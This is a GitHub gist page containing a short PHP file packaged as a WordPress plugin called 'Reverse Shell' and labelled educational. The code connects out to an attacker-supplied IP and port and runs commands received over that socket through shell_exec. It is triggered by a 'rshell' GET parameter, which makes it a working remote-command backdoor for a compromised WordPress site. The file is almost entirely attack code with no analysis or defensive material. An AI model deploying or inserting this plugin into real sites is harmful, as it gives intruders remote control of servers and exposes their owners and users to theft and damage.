Created
December 14, 2024 08:03
-
-
Save blackvoidx/0123ae41945b0621637a8a5413fc7133 to your computer and use it in GitHub Desktop.
Wordpress plugin shell for educational purposes
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /* | |
| Plugin Name: Reverse Shell | |
| Description: A simple plugin to test reverse shell connections (educational purposes only). | |
| Author: Ethical Tester | |
| Version: 1.0 | |
| */ | |
| function reverse_shell() { | |
| // Replace with your attacker's IP and port | |
| $ip = 'IP'; // Change to your IP | |
| $port = PORT; // Change to your port | |
| if (!function_exists('fsockopen')) { | |
| echo "fsockopen function is not available. Cannot create reverse shell."; | |
| return; | |
| } | |
| $sock = fsockopen($ip, $port); | |
| if (!$sock) { | |
| echo "Failed to connect to the attacker."; | |
| return; | |
| } | |
| $cmd = "/bin/sh -i"; | |
| fwrite($sock, "Connection established\n"); | |
| while ($cmd) { | |
| fwrite($sock, "$ "); | |
| $cmd = trim(fgets($sock, 1024)); | |
| $output = shell_exec($cmd . " 2>&1"); | |
| fwrite($sock, $output); | |
| } | |
| fclose($sock); | |
| } | |
| // Hook to trigger reverse shell | |
| if (isset($_GET['rshell'])) { | |
| reverse_shell(); | |
| } | |
| ?> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment